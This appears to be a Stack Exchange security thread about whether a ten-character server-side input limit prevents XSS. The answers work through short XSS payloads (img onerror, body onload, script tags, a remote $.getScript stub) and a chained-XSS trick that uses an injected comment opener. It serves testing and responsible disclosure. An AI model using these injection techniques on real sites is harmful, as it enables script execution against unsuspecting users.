# XSS payload with ten character length restriction

Tags: web-application, xss

There is an input field  which is not getting encoded at the server side. But if you give a whole script say `<img src=a onerror=alert(1)>`, it shows an error like: `<img src=a....'` is not a valid value.

I am not aware of any payload which is short enough to exploit this.

- Is carrying out an XSS attack possible?
- If not, how should I report this vulnerability to the application owner?

Comment: There is no shorter payload than this one except from eval. You can eval a variable (eval(a)) if there is one in the web page. It is one character shorter.Simply repport the fact that the input in not encoded and that it could be vulberable.

Comment: This sounds like a good challenge for [Code Golf](http://codegolf.stackexchange.com/). If 10 chars is not enough, how many chars would it take?

Comment: Are you sure that the 10 character limit is enforced on the server-side and not just on the client?

Comment: @Jedi yes it is on the server side. I entered 'abcd' in the input in browser and then intercepted the request through BurpSuite. Then I put the <img> tag and got the above response.

Answer (score 6, accepted):

> Is carrying out an XSS attack possible?

No, 10 characters is not enough to exploit this. If you want to enter a JavaScript context, at the very minimum, you would need:

- 1 < to get into a tag context
- 1+ [a-z] for the tag name
- 1 space
- 1+ [a-z] for the attribute (in practice, the shortest event attribute that currently exists is onload, which is 6 characters)
- 1 =
- your payload

That means even in an ideal situation, you only have 5 characters for your payload. Even if something like jQuery is already loaded, loading a remote script takes more characters than that.

In reality, you don't even have 5 characters. The shortest attribute is 6 characters, but onload doesn't work with img without a valid src, so onerror is shorter, giving you `<img onerror=[] src=a>` (20 characters). With a body tag, you could reduce this a bit: `<body onload=[]>` (14 characters), which is still too long. And you still need your payload, which will be a minimum of ~25 characters (eg `$.getScript('http://x.c')`).

This means that in your situation, script tags would actually be shortest. But you would only get to `<script sr` with 10 characters.

You can't even inject a link, which may possibly be used for phishing, as an a tag is cut of as well: `<a href=ht`

> If not, how should I report this vulnerability to the application owner?

Is the length of the text configurable? In that case this would still be a valid vulnerability.

If it is not configurable, I wouldn't consider it an exploitable vulnerability, but I would still report it (at least if I am contacting them anyways because of further issues), as it may become an issue in the future in case the vendor decides to show more characters.

Comment: I have recommended them not to send a detailed error message and skip showing input value from the response altogether.

Answer (score 4):

It will depend, but if there's another place where user input is inserted, these 10 characters would be enough to fool the browser into parsing it into another context.

Suppose that there is below an image (eg. an avatar) that can be controlled by an attacker, including the alt text. An attacker could set:

```
<img src="myimage.jpg" alt="--><script>alert(1);</script>" />
```

It would be safe not to encode this alt text, since it only appears into a parameter.

However, if the unencoded text in the error message was "`<!--`", then everything up to the `-->` in the parameter gets treated as a comment, and the alert() executes.

Another option would be an unfiltered text like «`<b c="`», although the rest of the payload would need to be much nearer.

The parameter might be anything (eg. the image url), as far as the "redundant" escaping wasn't performed on it, and it appears after the unfiltered text (actual exploitability will depend on the tags inbetween).

Comment: This kind of technique has been called "Chained XSS" at: http://www.highseverity.com/2011/06/xss-in-confined-spaces.html Using JavaScript comments like `<script>/**/alert(1)` is another useful option.